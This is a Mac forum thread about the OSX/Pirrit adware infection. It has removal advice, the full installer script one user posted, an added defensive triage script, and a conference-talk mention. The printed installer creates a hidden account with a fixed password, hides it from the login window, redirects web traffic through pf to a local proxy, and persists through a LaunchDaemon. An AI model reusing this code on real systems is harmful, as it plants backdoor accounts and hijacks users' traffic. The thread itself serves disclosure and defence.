
Weaselboy

Moderator
Staff member
Jan 23, 2005
34,491
16,218
California
I agree with you it is likely okay to delete, but try a boot to safe mode by holding the shift key at startup. That should delete that whole folder. If it is still there afterwards, do a good clone in case things go badly then try and delete from Terminal.
 

Kitu

macrumors newbie
Original poster
Apr 5, 2016
12
2
Thanks WB - appreciated! I shall follow your advice.

Cheers, K.
 

wandal

macrumors newbie
Feb 17, 2010
18
0
Italy
Hi everybody.

Nasty things here: we opened one of the damned files, setupinjector.sh, and here it is.
So, you can notice how the "casual" titles are built up. Chameleonic behaviour. And spread wide in so many hidden folders.

#!/bin/sh
updf="/var/tmp/updt.txt"

# get random names
n=$(cat /usr/share/dict/words | wc -l)

companyName=$(cat -n /usr/share/dict/words | grep -w $(jot -r 1 1 $n) | cut -f2)
echo $companyName

# create hidden user
HIDDEN_USER=$(cat -n /usr/share/dict/words | grep -w $(jot -r 1 1 $n) | cut -f2)
echo $HIDDEN_USER >> $updf
userName=$HIDDEN_USER

preferencesFileName="com."
preferencesFileName+=$companyName
preferencesFileName+=".plist"
echo $preferencesFileName >> $updf

netPreferencesFileName="com."
netPreferencesFileName+=$companyName
netPreferencesFileName+=".plist"
echo $netPreferencesFileName >> $updf

settingsFileName=$companyName
settingsFileName+=".sh"

configFileName=$companyName
configFileName+=".conf"

settingsFileData="#!/bin/sh\n\
\n\
if [ -a /Library/"$companyName"/Contents/MacOS/"$companyName" ];\n\
then\n\
sleep 10\n\
sudo pfctl -evf /etc/"$configFileName"\n\
sudo -u "$userName" /Library/"$companyName"/Contents/MacOS/"$companyName"\n\
fi\n\
exit 0\n"
echo "$settingsFileData" > /etc/$settingsFileName
sudo chown root /etc/$settingsFileName
sudo chmod 755 /etc/$settingsFileName

# copy files
sudo cp -r Injector.app $companyName
sudo cp -r $companyName /Library
sudo rm -r $companyName
sudo chmod -R 755 "/Library/"$companyName

#change name of the exe
sudo mv "/Library/"$companyName"/Contents/MacOS/Injector" "/Library/"$companyName"/Contents/MacOS/"$companyName

#configure hidden account
HIDDEN_PASS=test
HIDDEN_UID=401
HIDDEN_NAME="User "$HIDDEN_USER

HIDDEN_HOME="/var/$HIDDEN_USER"

sudo dscl . -create /Users/$HIDDEN_USER UniqueID $HIDDEN_UID
sudo dscl . -create /Users/$HIDDEN_USER PrimaryGroupID 20
sudo dscl . -create /Users/$HIDDEN_USER NFSHomeDirectory "$HIDDEN_HOME"
sudo dscl . -create /Users/$HIDDEN_USER UserShell /bin/bash
sudo dscl . -create /Users/$HIDDEN_USER RealName "$HIDDEN_NAME"
sudo dscl . -passwd /Users/$HIDDEN_USER $HIDDEN_PASS
sudo mkdir "$HIDDEN_HOME"
sudo chown -R $HIDDEN_USER "$HIDDEN_HOME"
sudo chmod a+rwx "/Library/"$companyName"/Contents/MacOS/"$companyName

# Enable the Hide500Users attribute
sudo defaults write /Library/Preferences/com.apple.loginwindow Hide500Users -bool YES

# read parameters
dist_channel_id=$1
machine_id=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }')
click_id=$2
domain=$3

if [ -z "$dist_channel_id" ];
then
echo "Default for dist channel" >> $updf
dist_channel_id="A1000"
fi

if [ -z "$click_id" ];
then
echo "Default for click id" >> $updf
click_id="0"
fi

if [ -z "$domain" ];
then
echo "Default for domain"
domain="http://aadcd15734d97346bb85f545dc8ca03e7e.com"
fi

# write parameters to preferences file
sudo defaults write "/Library/Preferences/"$preferencesFileName dist_channel_id "$dist_channel_id"
sudo defaults write "/Library/Preferences/"$preferencesFileName machine_id "$machine_id"
sudo defaults write "/Library/Preferences/"$preferencesFileName click_id "$click_id"
sudo defaults write "/Library/Preferences/"$preferencesFileName domain "$domain"
sudo plutil -convert xml1 "/Library/Preferences/"$preferencesFileName

# INSTALL SERVER
# set redirections
activeInterface=$(route get default | sed -n -e 's/^.*interface: //p')
if [ -n "$activeInterface" ]; then
pfData="rdr pass inet proto tcp from $activeInterface to any port 80 -> 127.0.0.1 port 9882\n\
pass out on $activeInterface route-to lo0 inet proto tcp from $activeInterface to any port 80 keep state\n\
pass out proto tcp all user "$HIDDEN_USER"\n"
echo "$pfData" > /etc/$configFileName

# run server
sudo cp com.pref.plist "/Library/LaunchDaemons/"$netPreferencesFileName
sudo defaults write "/Library/LaunchDaemons/"$netPreferencesFileName Label "$netPreferencesFileName"
sudo defaults write "/Library/LaunchDaemons/"$netPreferencesFileName ProgramArguments -array '/etc/'$settingsFileName''
sudo chmod 755 "/Library/LaunchDaemons/"$netPreferencesFileName
sudo launchctl load -w "/Library/LaunchDaemons/"$netPreferencesFileName

else
echo "Unable to find active interface" >> $updf
exit 1
fi

exit 0
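A triage helper for the footprints this installer leaves behind (a pf rdr rule sending web traffic to a local port, an account below UID 500 hidden by Hide500Users, a LaunchDaemon that runs a script out of /etc, and the /var/tmp/updt.txt log). This is an added example written for this thread, not part of wandal's post or of the malware; the check functions take command output as text so they can be exercised on constructed samples, and run_live_checks only does anything on a Mac.

```shell
#!/bin/sh
# Added triage helper for the OSX/Pirrit installer behaviour posted above.
# Not part of wandal's post or the malware itself; written for this thread.
# Each check takes command output as text so it can be tested on samples.

# 1. pf rdr rules that send TCP traffic to the loopback address, as the
#    installer does for port 80 -> 127.0.0.1 port 9882 (generalised to any port).
pf_loopback_redirects() {
    printf '%s\n' "$1" | grep -E 'rdr .*-> 127\.0\.0\.1'
}

# 2. Accounts below UID 500 that are not Apple's built-in ones. The installer
#    creates one at UID 401 and sets Hide500Users so the login window hides it.
#    Input format is that of: dscl . -list /Users UniqueID   ("<name> <uid>")
suspicious_low_uids() {
    printf '%s\n' "$1" | awk '$1 !~ /^_/ && $1 != "root" && $1 != "daemon" && $1 != "nobody" && $2+0 < 500 { print $1 }'
}

# 3. LaunchDaemon plists whose ProgramArguments point at a shell script in /etc,
#    where the installer drops /etc/<randomword>.sh. Argument: plist directory.
etc_script_launchdaemons() {
    grep -lE '<string>/etc/[A-Za-z]+\.sh</string>' "$1"/*.plist 2>/dev/null
}

# Run the checks against the live system; skipped with a message off macOS.
run_live_checks() {
    command -v dscl >/dev/null 2>&1 || { echo "not macOS, skipping live checks"; return 0; }
    echo "== pf rdr rules to loopback =="
    pf_loopback_redirects "$(sudo pfctl -sn 2>/dev/null)"
    echo "== non-Apple accounts with UID < 500 =="
    suspicious_low_uids "$(dscl . -list /Users UniqueID)"
    echo "== LaunchDaemons running a script from /etc =="
    etc_script_launchdaemons /Library/LaunchDaemons
    echo "== Hide500Users =="
    defaults read /Library/Preferences/com.apple.loginwindow Hide500Users 2>/dev/null || echo "not set"
    if [ -f /var/tmp/updt.txt ]; then echo "installer log /var/tmp/updt.txt present"; fi
    return 0
}

run_live_checks
```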
 

0xAmit

macrumors newbie
Apr 6, 2016
3
5
Israel
All,
Last week I gave a talk at the LayerOne security conference in Los Angeles about Osx/Pirrit. You can watch it here:
 